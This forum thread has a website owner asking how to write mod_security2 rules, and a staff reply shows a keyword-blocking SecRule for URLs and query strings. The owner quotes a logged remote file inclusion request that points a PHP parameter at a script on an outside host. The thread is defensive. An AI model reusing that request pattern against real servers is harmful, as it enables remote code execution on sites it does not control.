HOW: Create my own mod_security2 rules?

SuperBaby

Well-Known Member
Nov 27, 2003
345
1
166
Thailand
cPanel Access Level
Website Owner
Twitter
I checked my mod_security2 log file and see a lot of entries similar to this:

GET /myfolder1/main.php?id=http://submitstation.de/xxxxxx/cmd.jpg

How do I set up a mod_security2 rule so that the hacker is stopped when:

1) He points his browser to my URL and the URL contain a specific word. In the above case, I would ban "submitstation.de".

2) He submits a form from my site and the content contains a specific word.
 

cPDan

cPanel Staff
Staff member
Mar 9, 2004
724
15
243
SecRule "REQUEST_URI|QUERY_STRING" "aaa|bbb"

I added the rule above to mod_security2. It successfully forbid the access if the URL contains aaa or bbb. But it does not prevent aaa and bbb from a submission form.
a form, at least via POSt is not part of the URI or QUERY_STRING, your best bet is to ask the mod security folks how to filter POST requests